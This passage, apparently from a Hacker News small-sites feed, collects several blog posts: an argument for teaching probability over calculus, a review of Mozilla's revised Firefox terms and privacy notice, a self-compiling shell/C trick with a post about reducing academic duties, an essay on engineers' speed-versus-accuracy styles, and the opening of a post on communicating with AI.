    • Social Media Content Creation: For aspiring YouTubers or TikTok creators, statistical thinking offers immediate value. Students could analyze video performance data to determine what factors correlate with higher engagement, use A/B testing to compare different title formats, or apply probability to predict which content categories have the best chance of going viral based on platform algorithm patterns.
    • Gaming Strategy: Video games provide a perfect laboratory for probability concepts. Students could calculate drop rates for rare items, optimize resource allocation in strategy games, or analyze win rates with different character builds. The mathematics of expected value directly translates to better gaming decisions, creating an immediate connection between abstract concepts and personal interests.
    • Music and Streaming Analytics: Students could examine the probability distributions of streams across different artists, analyze what makes songs trend on platforms like Spotify, or calculate the expected payout from streaming versus other revenue sources – connecting statistical thinking to their passion for music.
    • Understanding Social Dynamics: Probability helps make sense of social phenomena students experience daily. What are the chances of two people in their class sharing a birthday? How can they understand selection bias in social circles? Why do certain rumors spread faster than others? These questions make statistical concepts relevant to their immediate social world.
    • Consumer Decision-Making: Students regularly make purchasing decisions. Statistical literacy helps them analyze whether a sale is actually a good deal, understand the risk/reward of extended warranties, or calculate the expected lifetime cost of different electronics – skills they can apply immediately at the mall or online.

    When students see immediate and useful applications, the dreaded “when will we use this?” question disappears.

    The benefits of this shift would be profound. We’d graduate students better equipped to:

    • Make informed personal decisions about money, health, and risk
    • Understand scientific claims and evaluate evidence
    • Navigate an increasingly data-driven world
    • Think probabilistically about complex problems
    • Detect misleading statistics and flawed studies

    I will digress and offer one more slightly detailed and pressing reason to prioritize probability education: the explosion of sports betting among young people, particularly young men. 

    As states legalize gambling and betting apps target younger audiences, many students will encounter these platforms and never truly understand the mathematics behind them. A strong foundation in probability & mathematical reasoning would help them see through the carefully crafted illusion of easy money, understand concepts like house edge and expected value, and recognize how betting odds are strategically designed to favor the house.

    Rather than simply telling students to avoid sports gambling (a strategy with limited effectiveness akin to abstinence-only sex education), we could equip them with the mathematical tools to understand why the vast majority of bettors lose money over time. This is mathematics as a form of protection against predatory industries and companies.

    Even for STEM-bound students, stronger foundations in probability and statistics would be valuable. Many cutting-edge fields like AI, genomics, and climate science rely heavily on statistical methods. A student heading into computer science is more likely to need knowledge of probabilistic algorithms than advanced calculus.

    Some will object that reducing traditional mathematics could harm students’ abstract reasoning abilities. But probability and statistics develop these same skills while being more practical. TBH, “abstract reasoning” is often the catch-all reason given when teachers can’t really answer a student’s “when will I use this?” question. It’s a thoughtful sounding way of saying “Because, I told you so”. Understanding confidence intervals requires just as much abstract thinking as understanding the quadratic formula – but one has far more real-world applications than the other.

    Here’s what a reformed curriculum might look like:

    • Middle School: Basic probability concepts, data literacy, and simple statistical measures
    • 9th Grade: Core algebra with probability applications
    • 10th Grade: Geometry with data visualization and spatial statistics
    • 11th Grade: Advanced algebra with statistical inference and modeling
    • 12th Grade: Advanced statistics and data analysis (with calculus as an optional track for STEM-focused students)

    This isn’t about making math easier or less rigorous – it’s about making it more relevant. 

    The mathematical challenges of understanding probability and working with statistics are just as rigorous as traditional topics. The difference is that students can see why these challenges matter.

    The world is becoming more complex and data-driven. The ability to think probabilistically and understand statistics isn’t just useful – it’s becoming essential. We owe it to our students to teach them the mathematical tools and associated reasoning they’ll actually need to navigate this world. The sooner we make this shift, the better equipped the next generation will be to face the challenges ahead.

    Some of the brightest minds in mathematics education – from Kahneman to Gelman – have been pointing us in this direction. It’s time we listened.

    The real opportunity here isn’t just better preparing students for some abstract future. It’s about making mathematics immediately relevant to their lives today. When students analyze the statistics of their favorite games, calculate the real odds of social phenomena they care about, or use probability to understand the news they consume, math transforms from a chore into a powerful lens for seeing their world more clearly.

    A shift toward probability and statistics could make math more democratic too. Traditional math curricula often function as sorting mechanisms, separating “math people” from everyone else. Statistical thinking, with its blend of quantitative skills and real-world contexts, can be more approachable and engaging for a broader range of students. Done right, it could help more students discover that they are “math people” after all.

    Building an education system around what’s relevant now, rather than around outdated notions of what might be useful someday, isn’t lowering our standards. It’s raising them by demanding that what we teach actually matters. The cost of continuing to teach the wrong math isn’t just wasted time—it’s a missed opportunity to give students tools they could be using every day.

    ]]>
    https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ hacker-news-small-sites-43207626 Fri, 28 Feb 2025 16:42:50 GMT
    <![CDATA[Mozilla has better lawyers than PR]]> thread link) | @gessha
    February 28, 2025 | https://thelibre.news/mozilla-has-better-lawyers-than-pr/ | archive.org

    Niccolò Venerandi

    10 min read

    Mozilla has better lawyers than PR

    Two days ago, Mozilla introduced new terms of use and an updated privacy notice for Firefox.

    This is the reaction. What the general public took out of the new terms is, well, we should probably switch to another browser.

    I spent yesterday reading tweets and private messages all saying something to the tune of: goodbye Firefox!

    But is there any truth to this? Well, let's dive in.

    Firstly, the facts. Mozilla announced a new set of Terms of Use, which we had not had before, and an updated Privacy Notice. Let's start with the former.

    fullscreen

    The controversial paragraph is the following, and I'm going to read it in its entirety:

    You give Mozilla all rights necessary to operate Firefox, including processing data as we describe in the Firefox Privacy Notice, as well as acting on your behalf to help you navigate the internet. When you upload or input information through Firefox, you hereby grant us a nonexclusive, royalty-free, worldwide license to use that information to help you navigate, experience, and interact with online content as you indicate with your use of Firefox.
    fullscreen

    There are a few other problematic sections. A few paragraph below, Mozilla warns that they can now "suspend or end anyone's access to Firefox at any time for any reason", though I'd love to see them try.

    fullscreen

    Finally, your use of Firefox now must follow a newly-created "Acceptable Use Policy". These include bans of most illegal activities (pirating, theft, violating copyrights, violating any person's privacy, harming children, and more):

    fullscreen

    However, you also cannot "Upload, download, transmit, display, or grant access to content that includes graphic depictions of sexuality or violence", i.e., you are no longer allowed to watch, upload, or distribute pornography or anything that depicts violence.

    The rest of the Terms of Use is what you would expect: a few indemnification clauses, software is provided as is, yadda yadda.

    Now, onto the Privacy Policy. This document is quite detailed and - I believe - understandable.

    Firstly, there's a list of all data collected to make the Firefox browser work. This includes the browser settings, the password manager, customization options, and such. Your browser history is also kept locally (e.g., for autocompletion purposes), as well as web form data (so you don't have to re-write everything if the browser closes), and so on.

    fullscreen

    There are a few advertisement clauses. If you search for location-related keywords and you have Sponsored Suggestions turned on, then you will be served advertisements related to that keyword, though they'll never link it directly to you as an individual. Firefox New Tab might also show advertising, and some technical and interaction data (how you interact with the ad) is collected and shared with partners on a de-identified or aggregated basis.

    fullscreen

    There are also a few sections regarding that data that you might want to share with Mozilla to help them improve their browser, such as how fast pages load for you and how many ads you see – all of this is, again, de-identified or aggregated (and you can opt out).

    fullscreen

    Nothing else catches my eye, though you might want to go check the webpage yourself.

    Finally, Mozilla also updated its FAQ page to remove all mentions of Firefox not selling your data. In all places where this was mentioned, it's not anymore.

    fullscreen

    Even worse, the entire question "Does Firefox sell your data?" (to which the answer was, "no obv") was also removed.

    I believe that's all. Of course, this paints a very bleak picture for Mozilla; some of us are left wondering why all of these changes are taking place, while others don't care and are jumping ship already.

    So, let's play a game. Let's try to build the best possible defense for Mozilla and see if it's solid. If it's not, that's a pretty big issue. Let's start with the "nonexclusive, royalty-free, worldwide license" to your data. According to Mozilla,

    We need a license to allow us to make some of the basic functionality of Firefox possible. Without it, we couldn’t use information typed into Firefox, for example. It does NOT give us ownership of your data or a right to use it for anything other than what is described in the Privacy Notice.
    fullscreen

    Brodie here dutifully points out that, no, the TOS does not give them ownership of your data, but it does grant them a license to it. However, this does not change the fact that they're still bound to their Privacy Notice, which did not allow for data usage aside from, well, operating the browser.

    Indeed, I'd like to stress that the license is "to use that information to help you navigate, experience and interact with online content as you indicate with your use of Firefox".

    The CEO of Epic Games and creator of Unreal Engine, Tim Sweeney, similarly defends Mozilla on this specific point:

    The license says that when you type stuff, the program can use the stuff you typed to do the thing you asked it to do. This is what programs ordinarily do, but nowadays lawyers tend to advise companies to say it explicitly.

    I don't hold particular sympathy towards him, but I believe he knows more than me about what the lawyers are up to these days.

    Many claimed that other browsers work just fine without this legal wording, but that's simply false.

    Google grants itself a worldwide, non-exclusive, royalty-free license to "host, reproduce, distribute, communicate, and use your content" and "modify and create derivative works" for the "limited purpose" of "operating and improving the services".

    fullscreen

    The same applies to Edge: Microsoft grants itself a "worldwide and royalty-free intellectual property license to use Your Content, for example, to make copies of, retain, transmit, reformat, display, and distribute via communication tools Your Content on the Services".

    fullscreen

    Outliers here are Safari, Brave, and Opera, which do not seem to currently have this mentioned.

    Other software have similar sentences, though; as an example, you're also giving Microsoft a full license to everything you write with Word, if you use that kind of software.

    Let's assume that's why the sentence was there. But why ban pornography?

    The key here is that the Acceptable Use Policy starts with: "You may not use any of Mozilla’s services to".

    In the Terms of Service, the word "services" is defined as: Mozilla VPN, Firefox Relay, Firefox Monitor, Firefox Note, Firefox sync and Pocket. This does not seem to include Firefox.

    fullscreen

    Thus, what the Acceptable Use Policy is likely asking to do is avoiding anything illegal (or pornographic) when using their VPN, and maybe when saving articles to Pocket.

    Out of curiosity, I checked whether NordVPN, one of the most well-known VPN companies, also has the terms. They do, disallowing any illegal content, but also "threatening, stalking, harming or harassing others, or promoting bigotry or discrimination".

    fullscreen

    So maybe this can be clarified as a VPN-type of thing that does not apply to Firefox, since it's not a service. But this still does not explain why on earth they would remove the "we won't sell your data" from their FAQ page.

    Well, Mozilla did some damage control by adding a new question, phrased as "It seems like every company on the web is buying and selling my data. You’re probably no different.".

    This is not a question, but the answer is nonetheless very interesting:

    Mozilla doesn’t sell data about you (in the way that most people think about “selling data“), and we don’t buy data about you. Since we strive for transparency, and the LEGAL definition of “sale of data“ is extremely broad in some places, we’ve had to step back from making the definitive statements you know and love.
    fullscreen

    A few people here are speculating that the deal with Google might be at fault: since they receive money to use Google out of the box, which in turn collects your data, that might be considered "selling your data" in some jurisdictions.

    That concludes the best defense of Mozilla I could put up. I would classify it as decent but not particularly compelling.

    A criticism I would like to immediately bring up, regardless of whether Mozilla is correct or not, is just how badly all of this was communicated. I'm not sure if they tried to hide these changes - like removing the "we won't sell your data" question - in the hope we wouldn't notice. Because if you knew we were going to notice, why wouldn't you immediately have an explanation ready to go? Why wait to explain yourself?

    And, even if I'm right in the distinction between services and the Firefox product, meaning I'm still allowed to watch porn… why is it so badly worded? The terms of service specifically talk about Firefox, and then there's a link to this list. Anyone would assume that it applies to what you do with the browser. Why not write more clearly?

    However, there are more direct flaws in my argument, too.

    Firstly, many users are pointing out that if I download the Firefox browser (and I operate it), therefore not necessarily using any of Mozilla services, I shouldn't need an agreement with Mozilla at all; why would then I license them my data?

    fullscreen

    This might have some explanation, such as Firefox using Mozilla's DNS, but it's getting into legalese speculation enough that I don't feel confident in weighing in.

    Ultimately, everything relies on the Privacy Policy, as it's all as solid as that document is. Is it solid? Please tell me it's solid.

    Let's start with data that Mozilla shares with "partners, service providers, suppliers and contractors". If they "sell your information", it's to them.

    fullscreen

    These partners, according to the webpage, are their search partners, such as Google, advertising partners, and a few related to Mozilla services you don't have to use (such as AI chatbots).

    fullscreen

    To provide search functionality and advertising, the following types of data are collected: technical data, location, language preference, settings data, unique identifiers, system performance data, interaction data, and search data.

    fullscreen

    Technical data is defined to be only about the hardware you are accessing the service from, the device type, operating system, IP address, and ISP.

    fullscreen

    The location only refers to your country code or city, and it does not include your precise location.

    Interaction data only refers to how you engage with their services ("how many tabs you have open or what you've clicked on, click counts, impression data, attribution data, number of searches performed, time on page, ad click").

    Search data is what you search for.

    This should be everything that Mozilla can share with partners, and according to them, it only does so in a de-identified or aggregated way.

    Then, there are authorities, such as governments. If there's a valid legal process ongoing, Mozilla might have to disclose personal data to that government in response to a Notice to law enforcement.

    fullscreen

    What kind of data? Any.

    fullscreen

    Examples of legal processes that would make Mozilla share personal data are Emergency Requests, Court Orders, National Security Requests, Pen Register Orders, Search Warrants, Subpoenas, and Wiretap Orders.

    Of course, this is not exactly a great look, but I don't think Mozilla could've done anything differently here. The safety net does not come from relying on the fact that Mozilla won't share your data with governments if asked, but rather from the fact that you don't need to use Mozilla services in the first place, so that your data is kept on-device and secure, plus you can build Firefox yourself so that you can trust it fully.

    So, to recap: to the best of my knowledge, no, Firefox/Mozilla can not use your data however they want, and I still consider it to be a very privacy-aware option. You also can still watch pornography - I think - just not when using their VPN. And they still don't sell your data, they just have the Google agreement they've always had. I don't think there's a reason to panic.

    But there's a reason to worry. What a mess: this felt like a very rushed move. I want to give the benefit of the doubt that they asked for a legal review of their previous documents, and the legal team replied with: Hey, change all of this immediately, because we've discovered flaws that might get us in court now that we're aware of them.

    Because if not, if they had time to prepare this announcement and think it through… what are they doing!?

    ]]>
    https://thelibre.news/mozilla-has-better-lawyers-than-pr/ hacker-news-small-sites-43207333 Fri, 28 Feb 2025 16:18:48 GMT
    <![CDATA[Misusing police database now over half of all cybercrime prosecutions in the UK [pdf]]]> thread link) | @luu
    February 28, 2025 | https://www.cl.cam.ac.uk/~ah793/papers/2025police.pdf | archive.org

    Unable to extract article]]>
    https://www.cl.cam.ac.uk/~ah793/papers/2025police.pdf hacker-news-small-sites-43207171 Fri, 28 Feb 2025 16:06:29 GMT
    <![CDATA[I'm starting to suspect my work is incompatible with a full-time academic job]]> thread link) | @luu
    February 28, 2025 | https://www.humprog.org/~stephen/blog/2025/02/28/#the-mess-im-in | archive.org

    Diverting trains of thought, wasting precious time

    Fri, 28 Feb 2025

    A more punny self-remaking C program

    To follow on from my previous proof-of-concept and later musings, here's another form of self-remaking C program in one file. This one involves some shell code that generates C code, to be included, using some punning a bit similar to my shell-and-Make one-filer.

    ///usr/bin/[ "$0".bin -nt "$0" ] || cc -save-temps -g "$0" -o "$0".bin <<EOSHELL || exit 1; exec "$0".bin "$@"; exit 42
    #ifdef EOSHELL
    $(
        # Here we write some shell code that outputs whatever C code we want.
        # It will be included when we do #include of stdin, below.
        # One application I have in mind is to probe a wrapped C compiler for
        # its supported options, and generate the C code that describes them,
        # where the core wrapper logic is written in C.
        echo "int myfunc(void) { return 42; }"
        # One problem is that if we put some elaborate shell code in here,
        # it gets difficult to test. Something like the following will work.
        # source <( sed -n '/^\$($/,/^)$/ p' wrapper.c | tail -n+2 | head -n-1 )
    )
    #else
    #define EOSHELL
    #endif
    EOSHELL
    // From here on we are in plain C and will never be run by the shell.
    
    #include <stdio.h>
    // Now can I include that file? YES
    #include "/dev/stdin"
    
    int main(int argc, char **argv)
    {
            printf("Hello, world! %d\n", myfunc());
            return 0;
    }
    

    [/devel] [all entries] permanent link contact

    The mess I'm in

    [TL;DR: I'm starting to suspect my work is incompatible with holding a full-time academic job at a present-day university, at least in the UK. I plan to drop my academic duties to some part-time percentage, to make time to pursue projects I care about and for other income streams. That could be contracting, but could also be crowdfunding from supporters. A little support could free me up to do significantly more writing and programming—and thinking, more importantly. These are things I've struggled to do productively since becoming a full-time academic in August 2018, a surprisingly big change from my precariously grant-funded but fairly research-focused existence. In effect I'd like to get back fractionally closer to that old existence. Any change will not take effect until September. If you might be interested in supporting me you can (thanks!) express this either by e-mailing me or (because social things like e-mail cost energy) filling in a form. Also please do send me thoughts about what you might like to get out of such an arrangement. How much interest I get will affect my next steps.]

    I recently got around to watching Devine Lu Linvega's excellent talk from 2023's (last) Strange Loop. Afterwards, YouTube handily recommended me Joe Armstrong's keynote from 2014—also the year of my own Strange Loop talk. It was a privilege to be in the room for Joe's talk, which was called The Mess We're In and was every bit the product of Joe's inimitable and much-missed mind. I personally enjoyed it; the message in short is that over-complexity has left software in a mess. For this, Joe proposed some remedies that were likeably off-the-wall (not in a bad way at all).

    It's time to admit that I'm in a mess too. It's a little over ten years since I boldly presented one of my research goals at that 2014 conference. The reception was positive and gratifying. I still get occasional fan mail about the talk. So where's the progress on those big ideas? There's certainly some, which I could detail—now isn't the time. But frankly, there's not enough. In the past year I turned 40... in fact I'm about to turn 41 as I write this. It's time to admit I've landed a long way from the place where that bright-eyed 30-year-old would have hoped his future self to end up. And as Joe's absence reminds us, none of us is here forever.

    If not there, then where am I? In short, I'm trapped in a mediocre, mismanaged version of academia that is turning me into a mediocre and (self-)mismanaged individual. The problem is far from one-way traffic: if I were a more brilliant or at least better self-managing individual, I could no doubt have done better. But for now, it's the mess I'm in. I need to get out of it, somehow.

    Although the academic life has felt like my vocation, my current experience of it is one I find suffocating. If you care about things that matter—truth, quality, learning, reason, knowledge, people, doing useful things with our short time on this planet—you are a poor fit for what most of our so-called universities have become in the UK. Three character traits will cause particular problems: caring too much, having values and having standards.

    Looking around, what I seem to observe is that whereas others can hack it, it's an atmosphere I find I am very poorly adapted to breathing. In short, far too much of my time is spent on regrettably meaningless tasks, and the incentives mostly point away from quality. I am trapped in only the bad quadrants of the Eisenhower matrix. To the extent that my mind is “in the institution”, it makes me feel pretty horrible: under-appreciated, over-measured, constantly bullshitted-to, serially misunderstood, encouraged to be a bureaucrat “system-gamer” and discouraged from both actually doing what I'm good at, and actually doing good. There is an enormous and exhausting cognitive dissonance generated by not only the stereotypical bureacracy but also the new, non-stereotypical corporate noise, the institutionally broken attitudes to teaching and the increasingly timewasterly tendencies of [organisations claiming to be] research funders.

    It's not all bad! There are still moments when it feels like my teaching is meaningful and my research time is going on things that matter. Those moments are just too few to sustain me, given the oter stuff. Having been a “proper” academic for over six years, at a couple of different places, I'm past the point of believing it will get easier or that the pain will become worth the gain, or that moving to another institution would make a large improvement. (Caveat: that's scoped to institutions within my foreseeable CV-reach, and ruling out international moves, which I dabbled with but have decided against.)

    If I'm not just to muddle on like this until I die or at least retire (it's scarily little time until I can claim my pension!), there's an imperative either to get out of this suffocating environment or at least to open up a vent... perhaps one large enough to crawl out of later. However, I'm not ready to Just Quit just yet. Being a citizen of the academic world is useful; I don't have to go for a metaphorical knighthood. My new plan is to focusing more on basic sufficiency. I want to use my citizenship to do good. There is still some will in the machine to do good, even though the the default pathways increasingly strangle such impulses; walking out would squander this meagre but still valuable capital.

    So the plan is back to opening up a vent. I expect to go part-time, to something like 0.6 or 0.7 at first, hopefully plugging some of the gap by doing a little more consulting and contracting. I already do these things a little, and being an academic itself is a bit like being self-employed already: although “within the system” and having a salary, one is still chasing funded opportunities that will buy flexibility, [time and influence] researchers, and other resources. I am fractionally swapping one system for another.

    I also hope to open a crowdfunding stream, with very modest expectations, just the vague goal of giving more of a sanctioned outlet to my overtly creative side. I enjoy writing, and a lot of what I program is essentially not for its publishable research results but for interest's sake or a sketched proof-of-concept. About 18 months ago I gave a fairly unfocused, disappointing(-to-me) talk and I was touched that a student afterwards told me not only how they had liked it but that they find my talks to have the latent concern of “finding beauty”. Without knowing exactly how my rambles evoked that response, I do know that if I can do more of that, I'll be doing something right.

    That's about doing more stuff. What am I hoping to cut out? Well, obviously the part-time thing will bring a reduction in my institutional teaching and admin duties. I have to say there is uncertainty about how much relief will arise in practice, but I think it's worth doing the experiment. Something I really want to get away from is the “Poissonian peril”: randomized arrival of mutually-unaware tasks that sometimes unluckily cluster together, creating a lot of stress and a big disruption to the “keep-going” stream of important work. If I can reduce these Poissonian interruptions I think it could have an outsized impact on what I can achieve. Conversely, if I suddenly have to drop some programming or writing mid-flow and don't get back until weeks later, the stopping and restarting is a very inefficient. Put differently: although context switching cannot be eliminated, swapping out to far-off long-term storage perhaps can be. This year until now has been pretty good for low-Poisson stay-in-RAM existence, thanks to my sabbatical in Canberra last semester, although the last few weeks have been hectic enough to undermine that. My tentative hope is that I can go just part-time enough for every year to be no more hectic than this one.

    For my first six months at King's, back in 2021, I had a very light load that left me a lot of time to my own devices. Looking back, mostly I spent it programming. That tells me something! I enjoy programming and I feel very sad and frustrated if I'm not doing it. I'd convinced myself that since my liballocs project was to be the centre of much of my work over at least the next 5–10 years it needed an investment of effort: to make it more accessible to students and generally anyone residing outside my head, and to overcome some technical debt that was already causing problems for getting research done. I've definitely made progress on all this, although this effort has become a victim of Hofstadter's law, and I sometimes feel I'm not reliably setting the right intermediate goals for myself (something I have often struggled with). Feeling more beholden to an interested audience could bring some useful focus here, and avoid the classic artist's trap of “you can't see it 'til it's finished!”.

    That's not the only parallel with creators. Academia for me has a strong “record label metaphor”: they give you a certain amount of backing, but in return they want you to “be a star” in a rather creativity-destroying way, because their finances depend on the income you generate. The hazards of this relationship are well-documented.

    I also have a growing pile of writing I'd like to do—literally hundreds of unfinished blog posts. I'm fortunate to have an audience that, although pretty small, is convincingly interested in what I'm doing. I'd like to create better channels for sharing thoughts and getting feedback. I must admit I am a pretty individual thinker at heart, so collaborative channels need to be constructed carefully. I'll give some thought to that over the coming months, but I'd love to hear from readers about any particular models they think would work.

    Although it might sound like I'm ramping down the education aspect of my work, I actually feel very motivated for some projects in this space. They're just, again, not ones I'm enabled or incentivised to pursue right now. I will write more about that in due course. Overall I have a total of four projects I'm hoping that my tweaked existence will help me progress, and two of them are educational. (I know, that's too many projects. One of them is “the linking book”... enough said already.)

    I should stop writing here and get this post out of the door. In summary, I'm making some changes in an attempt to achieve: a steadier, “keep-going”, less Poissonian existence; more consistent time for programming and writing best seen as creative work; greater distance between myself and the corporate-bullshit atmosphere; and aligning my support more with the model of a creative person. That's as a breathing vent for now, although possibly a future exit crawlway out of my current mess. While I've always sought to stand alone, it's not something anyone does by themselves. As Brian Wilson put it, you need a mess of help to stand alone... that's the new kind of mess I'm looking for, and I'll be humbled if anyone wants to be part of it.

    Please send me thoughts and comments if you have them! As mentioned up top, you can e-mail me but there's also a form in case that's easier.

    ALso I'll try to post something fun and technical soon, because it's been a while and (as mentioned) I have loads in the Hofstadterian almost-finished pile. I have my first vaguely Rust-flavoured piece almost ready to go....

    [/highered] [all entries] permanent link contact


    Powered by blosxom

    validate this page

    ]]>
    https://www.humprog.org/~stephen/blog/2025/02/28/#the-mess-im-in hacker-news-small-sites-43207153 Fri, 28 Feb 2025 16:04:59 GMT
    <![CDATA[The Software Engineer Spectrum: Speed vs. Accuracy]]> thread link) | @blah2244
    February 28, 2025 | https://benhowdle.im/software-engineer-spectrum.html | archive.org

    Introduction

    After 15 years in software engineering and engineering leadership—ranging from IC (individual contributor) roles to CTO—I've seen countless engineers thrive (or struggle) based on how well their working style aligns with the company's needs at the time, from the Cisco's and GoDaddy's of the world, to your favourite seed-stage startup, I've seen different engineers suit very different working environments and company stages.

    Over the years, I've spotted a pattern: all engineers exist on a spectrum between speed and accuracy.

    This spectrum isn't about skill or seniority—it's about how engineers naturally approach their work. Some lean towards speed, optimizing for fast iteration and progress, while others prioritize accuracy, ensuring long-term maintainability and scalability.

    Neither end of the spectrum is "better" than the other, but knowing where you sit—and understanding what kind of engineer your company actually needs—can be the difference between thriving in a role or feeling completely out of sync.


    The Speed vs. Accuracy Spectrum

    At one end of the spectrum, we have engineers who move fast, iterate quickly, and prioritize execution. At the other, we have engineers who optimize for correctness, long-term stability, and robustness.

    Here's how they compare:

    Attribute Speed-Oriented Engineers Accuracy-Oriented Engineers
    Mindset "Ship it now, improve it later" "Make sure it's right before it goes live"
    Strengths Quick iteration, adaptability, delivering MVPs fast Stability, scalability, long-term efficiency
    Challenges Tech debt, occasional instability, missing edge cases Slow delivery, risk of over-engineering
    Best suited for Startups, early-stage teams, hackathons Enterprise software, scaling startups, regulated industries
    Frustrated by Bureaucracy, slow decision-making, rigid processes, thorough review cycles Firefighting, rushed deadlines, unclear requirements

    In reality, no one is purely one or the other—everyone exists somewhere on this scale, shifting slightly depending on experience, team culture, and career growth.

    As an aside, I've figured out I sit somewhat more towards the speed end of the spectrum, but I still endeavour to account for the future where possible (ie. asking myself questions like, "is this tech-debt I can live with for now, and re-visit at a later date?"), but I love to make ideas "real" as quickly as possible - I find features and products that stay too theoretical for too long frustrating and hard to progress, so I'd much rather sketch out a first iteration (a prototype, MVP, etc...) and get it in front of everyone to pick apart.


    Why This Spectrum Matters

    Not all engineering roles are the same.

    The biggest mistake I've seen—both from hiring managers and engineers themselves—is mismatching an engineer's natural working style with the company's needs.

    Let's break this down with real-world examples:

    1. The Scrappy Startup (0 → 1 Phase)

    A newly launched startup needs to move fast, validate ideas, and iterate quickly. Speed-oriented engineers thrive here because:

    • There's less red tape—no endless meetings or approval chains. You tend to wear multiple hats and can move swiftly through decisions, because there's very little review process in place.
    • The goal is often to ship an MVP, not to perfect every function.
    • Bugs or inefficiencies are acceptable trade-offs for momentum. A product that people love that has quirks is far more valuable than perfect code that no-one wants.

    A startup filled with accuracy-first engineers can struggle in this phase. If every decision requires a debate about scalability, the company may never get a product in front of users. Dead on arrival.

    Who excels here?

    • Engineers who are comfortable cutting scope to deliver fast.
    • Those who thrive in ambiguity and don't need a perfect spec.
    • People who enjoy building and rebuilding as feedback comes in.
    • Staying closely aligned with the founder/C-level people can be hugely beneficial here - make sure you understand the business goals and vision correctly, communicate your intentions, go build.

    2. The Scaling Startup (1 → 10 Phase)

    Once a startup finds product-market fit, things shift. Growth means technical debt starts catching up, and what worked in the early days starts breaking.

    At this stage, accuracy starts to matter more. The company needs engineers who:

    • Think beyond today's solution and plan for the next 6-12 months.
    • Introduce better testing, automation, and architecture.
    • Push back against reckless speed when it threatens stability.

    The engineers who thrived in the early chaos might struggle here. A speed-focused engineer who loved hacking together an MVP may find the new focus on documentation, testing, and code quality frustrating.

    Who excels here?

    • Engineers who balance pragmatism with structure.
    • People who enjoy building reliable systems rather than chasing constant new features.
    • Those who can see the bigger picture and influence long-term decisions.
    • At this stage, in my CTO roles, I've stepped back and zoomed out, whilst other engineers have continued shipping features. It gives me the chance to add the stability to the product that was skipped over to "get it out there".

    3. The Enterprise or Regulated Industry (10 → 100 Phase)

    At enterprise scale, everything slows down. When a single bug could cause millions in losses or legal trouble, accuracy is king.

    Here, speed-focused engineers often feel handcuffed by bureaucracy. There's process, governance, and an expectation of predictable, well-tested releases.

    The best engineers in these environments:

    • Love digging into complex systems and making them robust.
    • Care deeply about consistency, compliance, and security.
    • Accept that things take time and focus on minimizing risk.

    For engineers who are happiest when shipping fast and breaking things? This can feel like a slow-moving nightmare.

    Who excels here?

    • Engineers who enjoy optimizing for scale and efficiency.
    • Those with patience for detailed planning and process-heavy work.
    • People who appreciate long-term code stability over quick wins.
    • I personally have to completely re-align my mindset when working with these companies - it doesn't naturally suit my working style, so I have to consciously slow down and amend my own expectations for how much I'm able to ship with the expedience I'm accustomed to.

    Finding the Right Fit for You

    If you've ever felt out of sync in a role, chances are it wasn't about skill—it was about fit.

    Questions to ask yourself:

    1. Do I get frustrated by slow decision-making?

      • If yes, you likely lean toward the speed-focused side.
    2. Do I feel uncomfortable shipping something I know isn't perfect?

      • If yes, you lean more towards accuracy.
    3. Do I prefer structured, well-defined work over ambiguity?

      • Accuracy-focused engineers thrive on clear problem spaces, while speed-focused ones embrace chaos.
    4. What excites me more—shipping a quick prototype or refining a system over time?

      • The first is speed; the second is accuracy.

    Recognizing your default mindset can help you find the right companies, teams, and roles where you'll thrive. If you can develop an awareness of your instinctive mindset, you can employ methods to consciously alter your working style, for the betterment of your own sanity and the success of the company.


    Advice for Engineering Leaders

    If you're hiring or managing engineers, understanding this spectrum is critical. The best teams blend both types of engineers strategically.

    • Early-stage startups? Hire for speed, but ensure someone can clean up tech debt later.
    • Scaling teams? Introduce structure without crushing momentum.
    • Enterprise teams? Protect stability, but don't let process stifle innovation.

    A great engineering culture values both ends of the spectrum—and allows engineers to shift across it as their careers evolve.

    I've managed and led teams where I've had engineers at opposite ends of the spectrum - being aware of this polarity can help decide who might be best suited to various tasks and features when it comes to planning the product.


    Final Thoughts

    Whether you're an IC or a CTO, recognizing the speed vs. accuracy spectrum can help you:

    • Find the right roles and companies that match your strengths.
    • Adapt as your career progresses and new challenges arise.
    • Build engineering teams that complement each other instead of clashing.

    The best engineers don't just write great code—they understand how to apply their strengths to the right problems, at the right time.


    Tweet:/software-engineer-spectrum.html

    ]]>
    https://benhowdle.im/software-engineer-spectrum.html hacker-news-small-sites-43206690 Fri, 28 Feb 2025 15:30:20 GMT
    <![CDATA[AI can't read your mind but iteration is expensive]]> thread link) | @nadis
    February 28, 2025 | https://blog.codeyam.com/p/ai-cant-read-your-mindbut-iteration | archive.org

    AI capabilities are rapidly improving. It’s difficult to predict exactly how good AI can become and on what timeframe those changes will occur. Regardless of how sophisticated AI becomes, one fundamental challenge persists: communication. Despite significant AI progress, effectively communicating with LLMs remains a significant and under-appreciated problem that will arguably hold back the value of AI, no matter how good it becomes.

    This challenge isn't unique to AI collaboration. Communication becomes a bottleneck whenever we work on complex projects with multiple “intelligent” actors involved (i.e. people or AI). Translating our thoughts with perfect fidelity is fundamentally impossible without some hypothetical mind-reading technology that doesn't yet exist. Even then, our thoughts are often more superficial and inconsistent than we realize.

    Every attempt to convey a complex idea inevitably loses something in translation. Whether communicating with humans, computers, or AI agents, perfectly transferring your mental model to another actor is an unrealistic expectation. The recipient's inherent biases and assumptions, combined with ambiguities in your explanation, guarantee some level of misinterpretation.

    With AI systems, these biases and assumptions often stem directly from their training data. If you have experimented with prompt engineering you have likely encountered this limitation firsthand.

    When you describe a task for AI to complete, the system makes assumptions about our instructions and how to implement them based on patterns in its training data. For instance, when asked to write tests for JavaScript code, AI systems will often default to Jest, which is a popular testing framework heavily represented in training datasets, even if that constraint is not dictated. This is usually a good thing, as it represents a shared context between you and the AI, but, if that context is not appropriate then the assumption will cause problems.

    Even when explicitly instructed not to use Jest, AI models frequently revert to outputs that include Jest. The statistical weight of Jest in the training data effectively overrides your specific instructions, demonstrating how deeply ingrained these patterns become.

    This pattern repeats across all kinds of communications. It's practically impossible to provide sufficiently detailed specifications for even moderately complex ideas. And since the AI’s assumptions are not visible to you, you can not easily predict how the AI will interpret your request.

    Even if you could somehow painstakingly articulate every necessary detail, the recipient must also perfectly process and integrate all that information. At some point the level of detail just becomes so great that it can be held in memory all at once. Even if that were not a problem, specifying anything at this level of detail while navigating unknown assumptions is practically impossible.

    This creates a significant obstacle whenever we collaborate on complex projects. Communication becomes a bottleneck filled with hidden challenges that only become apparent after a misstep reveals a misunderstanding.

    There are two primary approaches we can use to tackle this challenge: iteration and tools.

